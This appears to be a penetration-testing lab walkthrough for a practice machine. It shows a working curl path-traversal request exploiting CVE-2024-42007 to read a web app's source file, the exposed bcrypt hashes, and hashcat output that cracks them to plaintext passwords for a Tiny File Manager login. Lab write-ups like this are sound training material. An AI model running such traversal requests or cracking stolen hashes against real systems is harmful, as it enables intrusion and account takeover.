Arbitrary File Read
Conducting arbitrary file read on the target system via exploiting CVE-2024-42007
Tiny File Manager
Reading the source code of the target Tiny File Manager instance; /var/html/www/inex.php
Version Information
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ file=/var/www/html/index.php ; curl --path-as-is -s "http://$IP/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../../../../../../../../../../..$file" | grep -w 'Tiny File Manager'
* H3K | Tiny File Manager V2.5.3
define('APP_TITLE', 'Tiny File Manager');
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="H3K Tiny File Manager">
<p><h3><a href="https://github.com/prasathmani/tinyfilemanager" target="_blank" class="app-v-title"> Tiny File Manager <?php echo VERSION; ?></a></h3></p>
<div class="col-3 d-none d-sm-block"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div>
<div class="col-12"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div>
$msg = 'Tiny File Manager<br>Error: Cannot load configuration';
<meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
<meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
$tr['en']['AppName'] = 'Tiny File Manager'; $tr['en']['AppTitle'] = 'File Manager';The version is 2.5.3
Vulnerabilities
/Practice/SPX/3-Exploitation/attachments/{2C9E81D1-0BB5-457F-B7CE-4B8281AA61F9}.png)
Looking it up online reveals an RCE exploit; CVE-2021-45010
Credentials
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ file=/var/www/html/index.php ; curl --path-as-is -s "http://$IP/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../../../../../../../../../../..$file"
[...REDACTED...]/Practice/SPX/3-Exploitation/attachments/{0A6768B0-FD4C-421F-9DC7-0BD9196BCE0B}.png)
Credential hashes of both admin and user users;
$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ hashcat -a 0 -m 3200 .\hashes.txt /usr/share/wordlist/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Apr 08 16:44:18 2025 (3 mins, 14 secs)
Time.Estimated...: Tue Apr 08 23:32:53 2025 (6 hours, 45 mins)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1131 H/s (9.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........: 40 H/s (11.16ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........: 1170 H/s
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 227280/28688770 (0.79%)
Rejected.........: 0/227280 (0.00%)
Restore.Point....: 92864/14344385 (0.65%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:688-704
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:46-47
Candidate.Engine.: Device Generator
Candidates.#1....: Candyfloss -> 131280
Candidates.#3....: greg15 -> cretin
Hardware.Mon.#1..: Temp: 66c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi:profiler
$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG:lowprofile
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Apr 08 16:44:18 2025 (4 mins, 52 secs)
Time.Estimated...: Tue Apr 08 16:49:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1124 H/s (10.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........: 40 H/s (18.50ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........: 1164 H/s
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 434304/28688770 (1.51%)
Rejected.........: 0/434304 (0.00%)
Restore.Point....: 194576/14344385 (1.36%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:1008-1024
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:504-505
Candidate.Engine.: Device Generator
Candidates.#1....: marta12 -> louis13
Candidates.#3....: 150215 -> 11081980
Hardware.Mon.#1..: Temp: 66c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
Started: Tue Apr 08 16:43:55 2025
Stopped: Tue Apr 08 16:49:11 2025Password hashes cracked;
admin:lowprofileuser:profiler
The credential may be used to authenticate to the target Tiny File Manager instance